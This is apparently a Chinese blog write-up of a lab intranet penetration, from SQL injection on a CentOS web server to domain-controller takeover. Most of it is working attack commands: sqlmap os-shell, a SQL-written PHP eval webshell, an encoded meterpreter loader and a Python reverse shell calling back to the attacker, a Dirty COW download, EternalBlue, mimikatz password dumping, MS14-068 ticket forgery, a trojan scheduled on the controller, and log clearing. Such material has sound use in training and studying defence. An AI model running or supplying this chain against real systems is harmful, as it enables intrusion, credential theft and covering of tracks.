拓扑环境
- Kali Linux(攻击机)
- Centos6.4(web服务器)
- win7(域成员主机无法上网)
- win2008R2(域控无法上网)
文章图片
目的 通过Kali Linux拿到域控权限
2021最新整理网络安全\渗透测试/安全学习(全套视频、大厂面经、精品手册、必备工具包)一>点我<一
Web渗透 目录扫描 使用dirbuster工具扫描网站根目录
设置kali默认字典文件
/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
文章图片
扫描获得phpinfo.php
文章图片
得到网站绝对路径信息
文章图片
SQL查询报错 通过测试发现存在sql整型注入报错情况,进一步获取webshell
文章图片
SQL注入 通过sqlmap测试发现存在sql注入
sqlmap ‐u "http://IP:8888/newsshow.php?cid=4&id=19*" ‐‐dbms MYSQL ‐v3
文章图片
获取webshell 这里有绝对路径的情况下,可直接写入webshell。这里使用sqlmap os-shell的功能
sqlmap(os-shell) #通过sqlmap获取命令执行会话
sqlmap ‐u “http://IP/newsshow.php?cid=4&id=19*” ‐‐dbms MYSQL ‐v3 ‐‐os‐ shell`
文章图片
直接写webshell(pass)
http://IP/newsshow.php?cid=4&id=19 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,0x3c3f706870206576616c28245f504f53545b2770617373275d29 3f3e,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 into outfile '/var/www/html/webshell.php'
反弹shell 为了更好做后续操作,进行反弹shell
获取目标系统信息 os‐shell> uname ‐a
os‐shell> whereis python`
文章图片
获取meterpreter会话 由于网站上为linux默认安装python,可直接生成python反弹脚本
#生成python反弹脚本
msfvenom ‐p python/meterpreter/reverse_tcp LHOST=IP LPORT=4444 ‐f raw
#msf监听反向连接会话
msfconsole
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp set LHOST IP
set LPORT 4444
run
#msf监听快速启动
cat py_reverse_tcp.rc
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp set LHOST 192.168.0.17
set LPORT 4444
exploit
msfconsole ‐r py_reverse_tcp.rc
#在sqlmap os‐shell模式下执行python meterpreter反弹脚本
os‐shell> python ‐c "import base64,sys;
exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF‐8')} [sys.version_info[0]] ('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQ0KZm9yIHggaW4gcmFuZ2UoMTApOg0KCXRy eToNCgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KCQlzLmNvbm 5lY3QoKCYjMzk7SVAmIzM5Oyw0NDQ0KSkNCgkJYnJlYWsNCglleGNlcHQ6DQoJCXRpbWUu c2xlZXAoNSkNCmw9c3RydWN0LnVucGFjaygmIzM5OyZndDtJJiMzOTsscy5yZWN2KDQpKV swXQ0KZD1zLnJlY3YobCkNCndoaWxlIGxlbihkKSZsdDtsOg0KCWQrPXMucmVjdihsLWxl bihkKSkNCmV4ZWMoZCx7JiMzOTtzJiMzOTs6c30pDQo=')))"
文章图片
nc+python反弹 #kali监听会话
root@kali:~# nc ‐lvvp 6666
#在sqlmap os‐shell模式下执行python bash反弹脚本
os‐shell> python ‐c "import os;
import pty;
import socket;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect((' IP',6666));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.filen o(),2);
os.putenv('HISTFILE','/dev/null');
pty.spawn('/bin/bash');
s.clos e();
"`
sqlmap执行:
文章图片
监听端口返回反弹shell结果:
文章图片
提权 拿到shell后,尝试提升权限
查看当前内核版本 通过uname -a获取当前系统内核版本
文章图片
使用已知漏洞提权 根据可已知内核漏洞下载对应的提权程序(该处使用脏牛内核提权)
cd /tmp/ wget ‐‐no‐check‐certificate https://raw.githubusercontent.com/K3vinPlus/sundry/master/DirtyCow/dir ty.c gcc ‐pthread dirty.c ‐o dirty ‐lcrypt ./dirty 123456
文章图片
获得firefart用户,权限为root
su firefart
文章图片
切换用户为firefart后,将passwd恢复,避免root用户无法使用
mv /tmp/passwd.bak /etc/passwd
文章图片
横向渗透 通过查看网卡信息后发现存在内网地址信息
文章图片
内网代理 meterpreter自动路由(首选)
meterpreter > run autoroute ‐s 10.0.1.0/24 meterpreter > run autoroute ‐p
文章图片
reGeorg+proxychains 由于web服务器第二张网卡无法上网,需进行内网代理
在web服务器的shell下,下载tunnel.nosocket.php文件,做代理流量
1、网络下载 wget ‐‐no‐check‐certificate https://raw.githubusercontent.com/K3vinPlus/reGeorg/master/tunnel.noso cket.php mv tunnel.nosocket.php /var/www/html/ 2、本地上传 upload /root/reGeorg/tunnel.nosocket.php /var/www/html
文章图片
可正常访问tunnel.nosocket.php文件
[
文章图片
Kali上执行reGeorg代理脚本
python reGeorgSocksProxy.py ‐p 9999 ‐u http://IP:8888/tunnel.nosocket.php
文章图片
修改proxychains配置文件,在末行添加socks信息。
vim /etc/proxychains.conf socks5 127.0.0.1 9999
文章图片
##msf自带代理设置
setg Proxies socks5:127.0.0.1:9999
内网资产扫描 端口扫描 使用msf自带端口扫描模块,探测出10.0.1.9和10.0.1.254都存在445、3389端口。
use auxiliary/scanner/portscan/tcp set RHOSTS 10.0.1.1/24 set PORTS 21,22,23,80,389,445,873,1433,1521,2049,2181,2375,3306,3389,4899,5432,5 631,5900,5938,5984,6379,8000,8080,7001,9080,9200,10051,11211,20880,270 17,50070 set THREADS 10 exploit
10.0.1.9 IP端口开放情况
文章图片
10.0.1.254 IP端口开放情况
文章图片
MS17-010漏洞主机扫描 通过代理方式,使用msf框架扫描内网网段中存在MS17-010漏洞主机
root@kali:~# proxychains msfconsole use auxiliary/scanner/smb/smb_ms17_010 set RHOST 10.0.1.0‐254 set threads 10 exploit
文章图片
文章图片
文章图片
MS17-010漏洞利用 通过meterpreter路由方式,background之后使用ms17-010攻击模块进行攻击
use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp set RHOSTS 10.0.1.9 run
文章图片
域渗透 信息收集 查看当前主机信息
meterpreter > sysinfo
文章图片
获取当前域
文章图片
使用mimikatz获取密码
加载mimikatz模块
meterpreter > load mimikatz #读取内存中存放的账号密码明文信息 meterpreter > wdigest
文章图片
获取域账号SID
meterpreter > run post/windows/gather/enum_logged_on_users
文章图片
域控定位
net group "domain controllers" /domain ping dc1.kevin.com
文章图片
文章图片
MS14-068 python脚本生成票据
proxychains python ms14‐068.py ‐u liujiafeng@kevin.com ‐s S‐1‐5‐21‐ 4289546598‐4075965387‐827630551‐1111 ‐d 10.0.1.254 ‐p kevin@123
msf模块生成票据
use auxiliary/admin/kerberos/ms14_068_kerberos_checksum set DOMAIN KEVIN.com set USER liujiafeng set PASSWORD kevin@123 set USER_SID S‐1‐5‐21‐4289546598‐4075965387‐827630551‐1111 set RHOST 10.0.1.254
文章图片
本地生成kirbi文件
#kali切换目录到loot下将ms14‐068 bin票据复制到物理机 /root/.msf4/loot/ #物理机通过mimikatz转为kirbi文件 mimikatz # kerberos::clist 20191223050146_default_10.0.1.254_windows.kerberos_122860.bin /export
文章图片
kirbi转为ccache
#再将kirbi文件放到kali ticket_converter转换脚本目录下 #将kirbi文件转为ccache python ticket_converter.py 0‐00000000‐liujiafeng@krbtgt‐KEVIN.COM.kirbi TGT_liujiafeng@kevin.com.ccache mv TGT_liujiafeng@kevin.com.ccache /root/pykek/
文章图片
生成正向连接的msf test.exe木马
生成msf监听端口程序
msfvenom ‐p windows/x64/meterpreter/bind_tcp LHOST=10.0.1.254 LPORT=4444 ‐f exe ‐o /root/pykek/test.exe
新建一个msf会话监听正向连接payload
use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set RHOST 10.0.1.254
上传利用工具
上传利用工具、ms14-086黄金票据到win7跳板机上
upload /root/pykek/TGT_liujiafeng@kevin.com.ccache C:/users/kevin upload /usr/share/windows‐resources/mimikatz/x64/mimikatz.exe C:/Users/kevin upload /root/pykek/test.exe c:/users/kevin shell
文章图片
票据导入
在win7跳板机上执行
`#清空票据 klist purge
#导入票据
cd c:/users/kevin
mimikatz.exe
kerberos::ptc TGT_liujiafeng@kevin.com.ccache
复制木马到域控
再通过win7跳板机复制test.exe到域控c盘,并通过at命令添加定时任务执行test.exe
`copy test.exe \dc1.kevin.com\c$ dir \dc1.kevin.com\c
文章图片
在域控上添加at定时任务执行木马
net time \\dc1.kevin.com at \\dc1.kevin.com 15:42:00 c:\test.exe
文章图片
查看当前域控at定时任务
at \\dc1.kevin.com
文章图片
在域控at定时任务执行后,连接域控4444端口
文章图片
netstat ‐ano |findstr "4444"
文章图片
所有获得的meterpreter会话
文章图片
清除痕迹
结束msf木马进程,删除exe进程
at \\dc1.kevin.com 16:23:00 cmd /c del c:\test.exe
删除win7工具
cd c:/users/kevin rm TGT_liujiafeng@kevin.com.ccache rm mimikatz.exe
windows删除系统日志
【python|内网渗透横向攻击流程】clearev
推荐阅读
- 5个最好的Unix CLI文件编辑器
- 最好的开源渗透和安全测试(黑客)Linux操作系统
- 网络安全|【二】网络空间安全综述
- 使用shutil.copy复制具有文件名的文件路径列表
- Python如何在异常发生后立即停止执行函数()
- 无法在使用win32COM python库创建的PIVOT表中插入计算字段
- 如何像在REST中一样实现GRPC调用()
- Python Pandas将字符串与groupby结合在一起
- 读取csv乱码(如何读取带?的csv())